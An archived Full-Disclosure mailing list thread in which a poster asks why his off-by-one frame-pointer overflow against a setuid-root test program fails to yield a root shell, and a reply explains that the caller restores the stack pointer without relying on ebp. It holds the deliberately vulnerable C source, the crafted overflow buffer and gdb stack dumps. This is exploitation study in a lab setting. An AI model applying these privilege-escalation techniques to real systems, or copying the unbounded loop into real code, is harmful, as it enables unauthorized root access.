lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: Jason.Deckard at webmd.net (Deckard, Jason) Subject: exploiting off by one Hi Joe, I don't think the value in ebp is being used by main's caller. As you know, the calling convention requires the called procedure to preserve the state of ebp, but that is no guarantee that the caller will use ebp to restore esp. Looking at a disassembled version of your code, I can see gcc (version 3.2.3 here) reclaims the parts of the stack used by parameters by increasing esp with a constant value. For example: lea 0xffffff78(%ebp),%eax push %eax call 80482c8 add $0x8,%esp I suspect something similar is being done by main's caller. My apologies if I'm missing something obvious here. Regards, Jason Deckard -----Original Message----- From: full-disclosure-admin@...ts.netsys.com [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Joe Hickory Sent: Thursday, April 15, 2004 2:26 AM To: full-disclosure@...ts.netsys.com Subject: [Full-Disclosure] exploiting off by one hi fd, i'm trying to exploit some overflows to see how it works. i can exploit a "normal" stack overflow without problem, but now i'm trying to exploit an off by one overflow and have some questions, first see what i did: vulnerable program: #include <stdio.h> #include <unistd.h> #include <sys/types.h> #define BUFSIZE 128 int main(int argc, char **argv) { char buffer[BUFSIZE]; int i, bufsiz; uid_t userid; bufsiz = BUFSIZE; userid = geteuid(); setuid(userid); printf("userid: %i \n", userid); printf("buffsize: %i \n", sizeof(buffer)); printf("buffsize: %i \n", bufsiz); for(i=0;i<=sizeof(buffer);i++) { buffer[i] = argv[1][i]; } printf("buffsize: %i \n", strlen(buffer)); printf("buffer: %s\n", buffer); return 0; } $ ls -l -rwsr-xr-x 1 root wheel 7788 Apr 14 23:43 offbyone STARTING EGGSHELL: $ ./eggframeshell 134 68 1100 $EGG at: 0xcfbfd634 last_byte: 44 OVERFLOW BUFFER: $ echo -n $IJV | hexdump -v 0000000 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 0000010 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 0000020 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 0000030 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 0000040 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 0000050 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 0000060 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 0000070 d634 cfbf d634 cfbf d634 4444 4444 4444 0000080 4444 cfbf 0000084 $ gdb ./offbyone GNU gdb 4.16.1 Copyright 1996 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-unknown-openbsd3.5"... (gdb) break 21 warning: gdb ignores `const' qualifiers. Breakpoint 1 at 0x667: file offbyone.c, line 21. (gdb) run $IJV Starting program: /./offbyone $IJV userid: 1000 buffsize: 128 buffsize: 128 Breakpoint 1, main (argc=2, argv=0xcfbfd220) at offbyone.c:21 21 printf("buffsize: %i \n", strlen(buffer)); (gdb) info frame Stack level 0, frame at 0xcfbfd1c0: eip = 0x667 in main (offbyone.c:21); saved eip 0x4b1 called by frame at 0xcfbfd144 source language c. Arglist at 0xcfbfd1c0, args: argc=2, argv=0xcfbfd220 Locals at 0xcfbfd1c0, Previous frame's sp is 0x0 Saved registers: ebx at 0xcfbfd118, ebp at 0xcfbfd1c0, esi at 0xcfbfd11c, eip at 0xcfbfd1c4 (gdb) x/100x $esp 0xcfbfd118: 0xcfbfd368 0xcfbfd220 0x00000001 0x00000000 0xcfbfd128: 0x00000000 0xcfbfd17c 0x48f31671 0x000003e8 0xcfbfd138: 0x00000080 0x00000081 0xcfbfd634 0xcfbfd634 0xcfbfd148: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd158: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd168: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd178: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd188: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd198: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd1a8: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd1b8: 0x4444d634 0x44444444 0xcfbfd144 0x000004b1 0xcfbfd1c8: 0x00000002 0xcfbfd220 0xcfbfd22c 0xcfbfd368 0xcfbfd1d8: 0xcfbfd1fc 0x00000385 0x0000049f 0x00000000 0xcfbfd1e8: 0xcfbfd21c 0x00001000 0x48f2e000 0x00000000 0xcfbfd1f8: 0x00000410 0xcfbfd21c 0x00000427 0x00000002 0xcfbfd208: 0xcfbfd220 0xcfbfd22c 0x00000000 0xcfbfdff0 0xcfbfd218: 0x00000000 0x00000002 0xcfbfd368 0xcfbfd374 0xcfbfd228: 0x00000000 0xcfbfd3f9 0xcfbfd424 0xcfbfd495 0xcfbfd238: 0xcfbfd4a3 0xcfbfd4b1 0xcfbfd4c9 0xcfbfd4dd 0xcfbfd248: 0xcfbfd4f4 0xcfbfd519 0xcfbfd536 0xcfbfd5bf 0xcfbfd258: 0xcfbfd5ca 0xcfbfd5dd 0xcfbfdddd 0x00000000 0xcfbfd268: 0x00000003 0x00000034 0x00000004 0x00000020 0xcfbfd278: 0x00000005 0x00000006 0x00000006 0x00001000 0xcfbfd288: 0x00000007 0x48f2e000 0x00000008 0x00000000 0xcfbfd298: 0x00000009 0x00000410 0x00000000 0x00000000 (gdb) (gdb) x/x 0xcfbfd634 0xcfbfd634: 0x90909090 $ ./offbyone $IJV userid: 0 buffsize: 128 buffsize: 128 buffsize: 134 buffer: 4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4??? 4???4???4???4???4???4???4???4???4???4???4???4?DDDDDDD???? $ hope its enough information. just my question is: i manipulated the least significant byte of the frame pointer, pointing into my buffer. there in my buffer is the address of my shellcode as the manipulated returnaddress. but the program is not segfaulting, if the pointer points to $somewhere. it always exits normally, without opening a root shell to me. i'm using gcc 2.95 on openbsd 3.5 (with any stack and anti overflow protection disabled, "normal" overflow works well) hope anybody can enlighten me. joe -- NEU : GMX Internet.FreeDSL Ab sofort DSL-Tarif ohne Grundgeb?hr: http://www.gmx.net/info _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists